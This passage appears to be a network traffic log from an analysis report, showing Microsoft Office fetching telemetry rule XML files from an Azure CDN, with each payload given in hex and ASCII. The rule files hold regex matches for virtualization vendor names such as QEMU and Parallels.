version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.4	49814	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:26 UTC	192	OUT	GET /rules/rule120662v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:27 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:26 GMT Content-Type: text/xml Content-Length: 470 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBB181F65" x-ms-request-id: 6dbf519d-601e-0084-1b91-3f6b3f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114826Z-174f78459684bddphC1EWRbht4000000113g000000006xr9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:27 UTC	470	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.4	49815	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:26 UTC	192	OUT	GET /rules/rule120663v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:27 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:27 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB556A907" x-ms-request-id: aaf8d828-401e-0016-61be-4253e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114827Z-174f7845968n2hr8hC1EWR9cag0000001140000000000yvn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:27 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.4	49816	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:28 UTC	192	OUT	GET /rules/rule120664v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:29 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:28 GMT Content-Type: text/xml Content-Length: 502 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6A0D312" x-ms-request-id: 63854d8c-901e-007b-2581-3fac50000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114828Z-174f7845968kdththC1EWRzvxn0000000dqg000000006d1n x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:29 UTC	502	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.4	49817	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:28 UTC	192	OUT	GET /rules/rule120665v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:29 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:29 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D30478D" x-ms-request-id: 14d8e695-801e-008c-6b91-3f7130000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114829Z-174f78459685726chC1EWRsnbg00000011bg0000000097nz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:29 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.4	49818	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:28 UTC	192	OUT	GET /rules/rule120666v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:29 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:29 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3F48DAE" x-ms-request-id: a2105f9f-201e-00aa-1591-3f3928000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114829Z-174f7845968cpnpfhC1EWR3afc00000010z00000000077y9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:29 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.4	49819	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:29 UTC	192	OUT	GET /rules/rule120667v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:29 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:29 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BB9B6040B" x-ms-request-id: cf0a4750-201e-005d-5b07-42afb3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114829Z-174f7845968kdththC1EWRzvxn0000000dmg00000000ar6u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:29 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.4	49820	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:29 UTC	192	OUT	GET /rules/rule120668v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:29 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:29 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3CAEBB8" x-ms-request-id: ccb4b789-101e-0028-02af-428f64000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114829Z-174f7845968px8v7hC1EWR08ng00000011mg0000000075sf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-30 11:48:29 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.4	49821	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:30 UTC	192	OUT	GET /rules/rule120669v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:31 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:31 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB5284CCE" x-ms-request-id: 0cb5bd73-401e-0067-3644-4209c2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114831Z-174f7845968xr5c2hC1EWRd0hn0000000k600000000077g6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:31 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.4	49823	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:31 UTC	192	OUT	GET /rules/rule120671v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:31 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:31 GMT Content-Type: text/xml Content-Length: 432 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT ETag: "0x8DC582BAABA2A10" x-ms-request-id: fe673556-401e-0029-33ec-419b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114831Z-174f7845968px8v7hC1EWR08ng00000011k0000000008gv6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:31 UTC	432	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.4	49822	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:31 UTC	192	OUT	GET /rules/rule120670v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:31 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:31 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91EAD002" x-ms-request-id: 55122f27-801e-0083-61b2-42f0ae000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114831Z-174f7845968glpgnhC1EWR7uec00000011gg000000006yc6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:31 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.4	49824	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:31 UTC	192	OUT	GET /rules/rule120672v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:31 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:31 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA740822" x-ms-request-id: 438404c1-e01e-0020-72a2-42de90000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114831Z-174f78459685726chC1EWRsnbg00000011g0000000002h1v x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:31 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.4	49825	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:31 UTC	192	OUT	GET /rules/rule120673v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:31 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:31 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT ETag: "0x8DC582BB464F255" x-ms-request-id: 512a133a-001e-0066-4733-40561e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114831Z-174f784596886s2bhC1EWR743w00000011dg000000005hd6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:31 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 